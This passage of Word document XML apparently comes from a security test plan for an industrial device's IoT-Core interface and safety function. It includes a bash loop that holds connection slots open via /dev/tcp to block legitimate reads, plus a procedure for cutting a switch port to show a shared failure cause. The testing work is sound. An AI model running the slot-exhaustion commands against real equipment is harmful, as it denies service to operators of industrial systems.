          <w:p w14:paraId="1B510B59"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0F2D0B5C" w14:textId="0DDDEB3F"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"Block both slots"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E197A79"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6D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>for i in 1 2; do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="427C5AAF"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pt-BR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve">  (exec 3&lt;&gt;/dev/tcp/$SRIO/80; printf 'GET /deviceinfo HTTP/1.1\r\nHost: x\r\n\r\n' &gt;&amp;3; sleep 600) &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37AFC68A"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done</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D60633D"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jobs | tee cm_rq007-03_01_jobs.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25CC0376"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EAD99B7" w14:textId="2768FA6E"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"3rd attempt while both slots are occupied (expected: timeout)" | tee cm_rq007-03_02_blocked.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04EEBEC7"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time curl -s --max-time 5 http://$SRIO/deviceinfo/swrevision/getdata ) &gt;&gt; cm_rq007-03_02_blocked.txt 2&gt;&amp;1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56197BBC"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cat cm_rq007-03_02_blocked.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AACB1EA"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3E3236F3" w14:textId="61E46A6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"Free up one slot"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2772D30F"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kill %1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B17A490"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55111867" w14:textId="445BA35B"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"Retry after freeing up slot (expected: successful again)" | tee cm_rq007-03_03_after_release.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BE21D6F"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time curl -s --max-time 5 http://$SRIO/deviceinfo/swrevision/getdata ) &gt;&gt; cm_rq007-03_03_after_release.txt 2&gt;&amp;1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C8FE205"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cat cm_rq007-03_03_after_release.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36DECA96"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1C0E9E35" w14:textId="41A4E4A2"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"Cleanup: releasing second slot as well"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77D81631"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kill %2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37D845D2"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p>
          <w:p w14:paraId="7EFB520A" w14:textId="7777777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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A875826" w14:textId="48A864E7"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"SUMMARY"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="054D6FDE" w14:textId="1AD4AADB"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lastRenderedPageBreak/>
              <w:t>echo "- Baseline -"; cat cm_rq007-03_00_baseline.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06C944C2" w14:textId="69F4D2DA" w:rsidR="00652DF0"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 While blocked -"; cat cm_rq007-03_02_blocked.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D5EE185" w14:textId="16257564" w:rsidR="0069129D" w:rsidRPr="006D5B99" w:rsidRDefault="00652DF0" w:rsidP="00652DF0">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echo "- After release -"; cat cm_rq007-03_03_after_release.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069129D" w:rsidRPr="006D5B99" w14:paraId="2F43BB92" w14:textId="77777777" w:rsidTr="00F32393">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6D5B99" w:rsidRDefault="0069129D" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="206B4B27" w14:textId="77777777" w:rsidR="0015048A" w:rsidRPr="006D5B99"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Expected FAIL vs requirement: 3rd legitimate read blocked/timeout while 2 held; access restored only after release. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07CBC4A6" w14:textId="205134BB" w:rsidR="0069129D" w:rsidRPr="006D5B99"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Evidence: cm_rq007-03_hold.log, curl timing before/after. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D0E0AD7" w14:textId="77777777" w:rsidR="00105368" w:rsidRPr="006D5B99" w:rsidRDefault="00105368" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB76E7E" w14:textId="77777777" w:rsidR="00105368" w:rsidRPr="006D5B99" w:rsidRDefault="00105368" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64EE44BC" w14:textId="77777777" w:rsidR="000D4389" w:rsidRPr="006D5B99" w:rsidRDefault="002D77C2" w:rsidP="002D77C2">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ007-0</w:t>
      </w:r>
      <w:r w:rsidR="0097294D" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -  </w:t>
      </w:r>
      <w:r w:rsidR="000D4389" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Availability Inversion under Gateway/Internal-Comms Interruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9649B3" w14:textId="2E49EBF8" w:rsidR="002D77C2" w:rsidRPr="006D5B99" w:rsidRDefault="002D77C2" w:rsidP="002D77C2">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6D5B99"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6D5B99" w:rsidRDefault="002D77C2" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10B95232"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6D5B99" w:rsidRDefault="002D77C2" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40C90165" w14:textId="06EA2FD8" w:rsidR="002D77C2" w:rsidRPr="006D5B99"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pt-BR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve">RQ-007 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 7.2 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset H, Asset F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D77C2" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="002D77C2" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A015B71" w14:textId="2B1D5512" w:rsidR="002D77C2" w:rsidRPr="006D5B99"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N/A , reliability/redundancy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D77C2" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="002D77C2" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19FBB330" w14:textId="279A7EB8"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SVV-</w:t>
            </w:r>
            <w:r w:rsidR="005D5934" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D77C2" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="002D77C2" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="611CC60C" w14:textId="4252B8E1" w:rsidR="002D77C2" w:rsidRPr="006D5B99"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a fault or internal-communication timeout in the non-safety gateway removes identification availability entirely while the safety function persists, so identification is structurally less available than the safety function it describes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D77C2" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="002D77C2" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34D23B1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Establish normal operation with identification available.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="003266EF"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Induce a gateway or internal-communication interruption.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28A3966C" w14:textId="77777777" w:rsidR="008D18CB"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the safety function persists (safe I/O behaviour unaffected).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38ADC7A4" w14:textId="26CE7E89" w:rsidR="002D77C2" w:rsidRPr="006D5B99"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identification becomes unavailable during the interruption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D77C2" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="002D77C2" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="684E0629" w14:textId="3FC9BF06" w:rsidR="00CA5768"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Gap-</w:t>
            </w:r>
            <w:r w:rsidR="00CA5768" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>characterization</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> test.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D01BC08" w14:textId="2E05B719" w:rsidR="002D77C2" w:rsidRPr="006D5B99"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 Expected: identification unavailable while the safety function persists </w:t>
            </w:r>
            <w:r w:rsidR="00A3728F" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms the no-redundancy gap (availability inversion).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="061AB5BD" w14:textId="77777777" w:rsidR="002D77C2" w:rsidRPr="006D5B99" w:rsidRDefault="002D77C2" w:rsidP="002D77C2">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49BAB48E" w14:textId="77777777" w:rsidR="002D77C2" w:rsidRPr="006D5B99" w:rsidRDefault="002D77C2" w:rsidP="002D77C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6D5B99"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6D5B99" w:rsidRDefault="002D77C2" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C662979" w14:textId="77777777" w:rsidR="002D77C2" w:rsidRPr="006D5B99"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D77C2" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="002D77C2" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="633D339C" w14:textId="41DD7130" w:rsidR="002D77C2" w:rsidRPr="006D5B99"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TC-RQ007-0</w:t>
            </w:r>
            <w:r w:rsidR="0097294D" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D4750" w:rsidRPr="006D5B99"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4750" w:rsidRPr="006D5B99" w:rsidRDefault="002D4750" w:rsidP="002D4750">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42B3EB93" w14:textId="3800ABA1"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partially </w:t>
            </w:r>
            <w:r w:rsidR="001A276A" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Feasible: The entire</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> fieldbus path is interrupted (switch port 2), yielding the same finding: IoT-Core AND safety communication depend on the same physical interface (no redundancy). </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D4750" w:rsidRPr="006D5B99"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4750" w:rsidRPr="006D5B99" w:rsidRDefault="002D4750" w:rsidP="002D4750">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37C6A79E" w14:textId="58A22AF1" w:rsidR="002D4750" w:rsidRPr="006D5B99" w:rsidRDefault="002D4750" w:rsidP="002D47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curl polling script, switch CLI/web UI, TIA Online &amp; Diagnostics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D4750" w:rsidRPr="006D5B99"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4750" w:rsidRPr="006D5B99" w:rsidRDefault="002D4750" w:rsidP="002D4750">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="605654A9"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AFAD3EC"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normal operation (both safety function and IoT-Core reachable).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33A10098"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Disable switch port 2 (complete communication outage):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42A0846F"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switch web UI/CLI: administratively shut down port 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23057F87"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24FA126B"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-o /dev/null -w '%{http_code}\n' --max-time 2 http://$SRIO/deviceinfo/swrevision/getdata</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28A16B70"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curl times out / non-200)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53A375FD"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parallel, check the TIA watch table: qualifier bad, outputs de-</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>energized</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40F23DA2" w14:textId="77777777" w:rsidR="002D4750" w:rsidRPr="006D5B99" w:rsidRDefault="002D4750" w:rsidP="002D47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F_WD_Time (as in TC-RQ001-05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DAF18C2" w14:textId="283337B6" w:rsidR="002D4750" w:rsidRPr="006D5B99" w:rsidRDefault="002D4750" w:rsidP="002D47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Re-enable port 2; check re-integration/acknowledgement in TIA.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D4750" w:rsidRPr="006D5B99"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2B3561B6" w:rsidR="002D4750" w:rsidRPr="006D5B99" w:rsidRDefault="002D4750" w:rsidP="002D4750">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27A0C9C2" w14:textId="6695DB85" w:rsidR="002D4750" w:rsidRPr="006D5B99" w:rsidRDefault="002D4750" w:rsidP="002D4750">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IoT-Core and safety communication fail TOGETHER (no separate diagnostic access while safety operation is active) </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms the lack of redundancy (G-3); this may differ from the originally assumed pure „availability inversion“ </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> instead a common failure cause; document accordingly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C83F56F" w14:textId="77777777" w:rsidR="00105368" w:rsidRPr="006D5B99" w:rsidRDefault="00105368" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C05B346" w14:textId="77777777" w:rsidR="00261D60" w:rsidRPr="006D5B99" w:rsidRDefault="00261D60" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C3B547" w14:textId="77777777" w:rsidR="00261D60" w:rsidRPr="006D5B99" w:rsidRDefault="00261D60" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08859E87" w14:textId="77777777" w:rsidR="00261D60" w:rsidRPr="006D5B99" w:rsidRDefault="00261D60" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="765B973E" w14:textId="77777777" w:rsidR="00EB205E" w:rsidRPr="006D5B99" w:rsidRDefault="00EB205E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="762C47B1" w14:textId="77777777" w:rsidR="00EB205E" w:rsidRPr="006D5B99" w:rsidRDefault="00EB205E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="472743DA" w14:textId="77777777" w:rsidR="00EB205E" w:rsidRPr="006D5B99" w:rsidRDefault="00EB205E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125B458F" w14:textId="77777777" w:rsidR="00EB205E" w:rsidRPr="006D5B99" w:rsidRDefault="00EB205E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EBE28DD" w14:textId="77777777" w:rsidR="00EB205E" w:rsidRPr="006D5B99" w:rsidRDefault="00EB205E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C72BCE8" w14:textId="77777777" w:rsidR="00EB205E" w:rsidRPr="006D5B99" w:rsidRDefault="00EB205E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F8A8CB5" w14:textId="77777777" w:rsidR="00EB205E" w:rsidRPr="006D5B99" w:rsidRDefault="00EB205E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E904C4" w14:textId="77777777" w:rsidR="00261D60" w:rsidRPr="006D5B99" w:rsidRDefault="00261D60" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013E50C5" w14:textId="77777777" w:rsidR="00CA5768" w:rsidRPr="006D5B99" w:rsidRDefault="00CA5768" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680EC5B8" w14:textId="77777777" w:rsidR="00CA5768" w:rsidRPr="006D5B99" w:rsidRDefault="00CA5768" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
